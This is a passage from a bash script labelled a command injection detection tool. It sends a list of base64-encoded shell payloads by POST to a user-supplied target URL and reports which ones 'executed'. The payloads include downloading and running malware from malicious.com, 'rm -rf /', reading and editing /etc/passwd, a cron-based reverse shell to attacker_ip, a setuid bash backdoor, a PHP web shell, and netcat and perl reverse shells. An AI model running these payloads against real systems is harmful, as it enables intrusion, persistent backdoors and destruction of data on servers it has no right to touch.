            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "cat /etc/passwd"
            "id;ls -al;whoami"
            "echo 'This is a test'"
            "mkdir /tmp/test_directory"
            "touch /tmp/test_file.txt"
            "wget http://malicious.com/malware.sh -O /tmp/malware.sh && chmod +x /tmp/malware.sh && /tmp/malware.sh"
            "curl -O http://malicious.com/backdoor.php -d 'cmd=id'"
            "rm -rf /"
            "uname -a;id"
            "find / -name '*.conf'"
            "grep -rn 'password' /etc"
            "echo 'My secret data' > /var/www/html/secret.txt"
            "tar -czf /tmp/backup.tar.gz /etc/passwd"
            "mv /var/log/syslog /tmp/syslog_backup"
            "head -n 10 /etc/passwd"
            "tail -n 10 /etc/passwd"
            "chmod 777 /var/www/html/index.php"
            "sed -i 's/old_password/new_password/g' /etc/passwd"
            "touch /etc/cron.d/backdoor && echo '* * * * * root /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1' > /etc/cron.d/backdoor"
            "cp /bin/bash /tmp/backdoor && chmod +s /tmp/backdoor"
            "echo '*/5 * * * * root /bin/bash -c \"rm -rf /tmp/*\"' > /etc/cron.d/clean_tmp"
            "echo '<?php system(\$_GET['cmd']); ?>' > /var/www/html/backdoor.php"
            "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip 1234 >/tmp/f"
            "nc -nlvp 1234 -e /bin/bash"
            "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"attacker_ip:4444\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
            )

    # Iterate over payloads and inject them into vulnerable parameters
    for payload in "${payloads[@]}"; do
        echo -e "${yellow}Testing payload: $payload${nc}"
        response=$(curl -s -d "param=$(echo $payload | base64)" -X POST "$1")
        echo -e "${yellow}Response: $response${nc}"
        echo -e "${yellow}------------------------------------------------------------${nc}"
        if [[ $response == *"attacker-controlled-domain.com"* || $response == *"Vulnerable"* || $response == *"bin"* ]]; then
            echo -e "${green}Payload '$payload' executed successfully. Vulnerability detected.${nc}"
            echo -e "${green}To regenerate this vulnerability, use the following command:${nc}"
            echo -e "${green}curl -d 'param=$(echo $payload | base64)' -X POST \"$1\"${nc}"
        else
            echo -e "${red}Payload '$payload' failed to execute. No vulnerability detected.${nc}"
            echo -e "${red}To test this payload further, you can try different variations or examine the server response for clues.${nc}"
        fi
    done
}

# Main function
main() {
    echo -e "${yellow}Command Injection Detection Tool${nc}"
    echo -e "${yellow}--------------------------------${nc}"

    # Prompt user for target URL
    read -p "Enter your target link: " target_url

    # Perform Command Injection detection
    detect_command_injection "$target_url"
}

# Call main function
main
